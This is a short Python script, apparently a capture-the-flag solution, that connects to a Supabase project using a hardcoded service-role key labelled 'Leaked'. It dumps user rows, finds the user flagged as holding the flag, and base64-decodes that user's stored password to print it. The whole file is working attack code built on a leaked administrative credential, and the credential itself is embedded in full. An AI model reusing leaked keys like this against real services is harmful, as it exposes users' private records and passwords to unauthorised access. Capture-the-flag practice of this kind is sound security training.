25 lines
951 B
Python
25 lines
951 B
Python
import os
|
|
from supabase import create_client, Client
|
|
import base64
|
|
|
|
# Leaked
|
|
url = "https://ybolulzygysmsjytomha.supabase.co"
|
|
key = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6Inlib2x1bHp5Z3lzbXNqeXRvbWhhIiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTczMDQ5NDkwOCwiZXhwIjoyMDQ2MDcwOTA4fQ.7XfwK3MZ8MaOa4g5T5Pg663nZJvnfQpd-Y91z9FWHj0"
|
|
|
|
supabase = create_client(url, key)
|
|
|
|
# Explore the schema by fetching some users
|
|
print("Some users to explore the schema:")
|
|
some_users = supabase.table("users").select("*").limit(5).execute()
|
|
print(some_users)
|
|
|
|
# Find the flag user
|
|
print("Only user with the flag as password:")
|
|
flag_user = supabase.table("users").select("*").is_("has_flag", True).execute()
|
|
print(flag_user)
|
|
|
|
# Decode the flag password
|
|
password_enc = flag_user.data[0]["password"]
|
|
ascii_password = password_enc.encode("ascii")
|
|
password_dec = base64.b64decode(ascii_password).decode("ascii")
|
|
print(f"Flag password: {password_dec}") |